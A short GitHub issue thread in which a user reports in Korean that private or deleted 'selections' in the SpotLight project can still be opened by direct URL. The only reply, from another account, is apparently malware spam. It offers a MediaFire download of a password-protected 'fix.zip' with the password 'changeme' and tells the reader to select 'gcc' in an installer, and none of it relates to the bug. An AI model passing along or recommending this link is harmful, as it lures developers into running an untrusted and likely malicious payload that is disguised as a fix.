### ISSUE TITLE
[BUG] : private, delete 셀렉션 접근

### ISSUE THREAD

**Issue by changchangwoo** [Programmers-SpotLight/SpotLight#266]
## ✨ 버그 설명

prviate, delete 셀렉션을 url로 접근하게 된다면 해당 설정을 하더라도 셀렉션이 접근되어집니다.
접근 후에 상태를 확인하고 리다이렉션 하는 로직이 필요할 것 같습니다!

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
